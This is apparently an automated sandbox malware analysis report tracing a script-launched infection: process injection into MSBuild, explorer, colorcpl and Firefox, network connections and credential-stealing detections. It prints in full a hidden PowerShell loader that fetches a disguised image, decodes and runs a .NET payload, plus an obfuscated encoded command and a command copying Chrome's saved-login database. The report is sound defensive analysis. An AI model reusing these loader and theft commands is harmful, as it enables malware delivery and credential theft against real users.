            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov eax, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov eax, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov ecx, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov ecx, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013892C5 mov eax, dword ptr fs:[00000030h]5_2_013892C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013892C5 mov eax, dword ptr fs:[00000030h]5_2_013892C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BD530 mov eax, dword ptr fs:[00000030h]5_2_013BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BD530 mov eax, dword ptr fs:[00000030h]5_2_013BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7505 mov eax, dword ptr fs:[00000030h]5_2_013B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7505 mov ecx, dword ptr fs:[00000030h]5_2_013B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BB570 mov eax, dword ptr fs:[00000030h]5_2_013BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BB570 mov eax, dword ptr fs:[00000030h]5_2_013BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B656A mov eax, dword ptr fs:[00000030h]5_2_013B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B656A mov eax, dword ptr fs:[00000030h]5_2_013B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B656A mov eax, dword ptr fs:[00000030h]5_2_013B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B562 mov eax, dword ptr fs:[00000030h]5_2_0137B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_000E1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_000E1AC3

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.187.200 443
            Source: C:\Windows\explorer.exe Network Connect: 203.161.57.217 80
            Source: C:\Windows\explorer.exe Network Connect: 217.160.0.95 80
            Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80
            Source: Yara match File source: amsi64_3492.amsi.csv, type: OTHER
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 2580
            Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 2580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A1C008
            Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '[encoded payload omitted]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7d
gtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('wbugp6qysf58ija!=yekhtua&21112%08168c3c4f36f6e4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7d
gtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('wbugp6qysf58ija!=yekhtua&21112%08168c3c4f36f6e4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
            Source: explorer.exe, 00000006.00000002.2934424185.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000006.00000002.2931305146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
            Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_000E1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_000E1975
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\colorcpl.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
